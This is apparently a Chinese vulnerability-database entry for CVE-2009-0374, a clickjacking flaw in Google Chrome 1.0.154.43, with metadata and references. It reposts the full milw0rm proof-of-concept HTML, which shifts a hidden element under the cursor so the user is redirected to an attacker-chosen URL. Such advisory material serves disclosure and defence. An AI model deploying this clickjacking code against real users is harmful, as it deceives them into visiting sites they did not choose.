Google Chrome 用户欺骗安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117305 漏洞类型 其他
发布时间 2009-01-28 更新时间 2009-02-02
CVE编号 CVE-2009-0374 CNNVD-ID CNNVD-200901-467
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/7903
https://cxsecurity.com/issue/WLB-2009010078
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-467
|漏洞详情
GoogleChrome是Google发布的一款浏览器。GoogleChrome1.0.154.43版本允许远程攻击者借助一个onclick事件,欺骗用户访问任意的URL。该onclick事件会将一个特制的元素转移到当前鼠标所在的位置。该漏洞与"click劫持"漏洞有关。
|漏洞EXP
#############################################################
# Application Name   : Google Chrome Web Browser
# Vulnerable Type    : Clickjacking
# Home                   : www.ozkanbozkurt.com
# Author                 : x0x
#############################################################
< ------------------- header data end of ------------------- >

<html>
<style type="text/css">
<!--
.style1 {
 font-size: 50px;
 font-weight: bold;
}
.style2 {
 color: #FF0000;
 font-weight: bold;
 font-size: 24px;
}
-->
</style>
<body>
<span class="style2">x0x</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location='http://www.cyber-warrior.org/BARCOD3';">This</div>
<p><strong>
  <script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br>
</p>
</html>
 
 
 
Greetz : All CW Users | All Muslims and Only Brother me Septemb0x

# milw0rm.com [2009-01-28]
|参考资料

来源:BUGTRAQ
名称:20090128Re:Advisory:GoogleChrome1.0.154.43ClickJackingVulnerability.
链接:http://www.securityfocus.com/archive/1/archive/1/500533/100/0/threaded
来源:BUGTRAQ
名称:20090128Advisory:GoogleChrome1.0.154.43ClickJackingVulnerability.
链接:http://www.securityfocus.com/archive/1/archive/1/500499/100/0/threaded
来源:MISC
链接:http://www.secniche.org/gcr_clkj/
来源:MILW0RM
名称:7903
链接:http://www.milw0rm.com/exploits/7903